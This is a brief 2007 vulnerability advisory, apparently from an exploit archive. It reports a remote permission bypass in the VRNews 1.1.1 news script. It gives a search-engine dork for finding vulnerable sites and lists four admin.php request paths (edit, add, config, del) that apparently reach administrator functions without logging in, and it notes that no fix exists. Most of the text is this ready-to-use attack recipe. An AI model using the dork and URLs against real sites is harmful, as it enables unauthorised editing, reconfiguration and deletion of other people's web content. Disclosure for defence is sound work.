VRNews 1.1.1 (admin.php) Remote Permission Bypass Vulnerability

2007-07-05 00:00:00

VRNews v1.x <= /VRNews/admin.php Permission

Found by: R4M! - [email protected]

Dork: intitle:"vrnews v1"

Script: http://www.toocharger.com/fiches/scripts/vrnews/3632.htm

Example:
1. /VRNews/admin.php?act=edit
2. /VRNews/admin.php?act=add
3. /VRNews/admin.php?act=config
4. /VRNews/admin.php?act=del

#

Fixes

No fixes

In order to submit a new fix you need to be registered.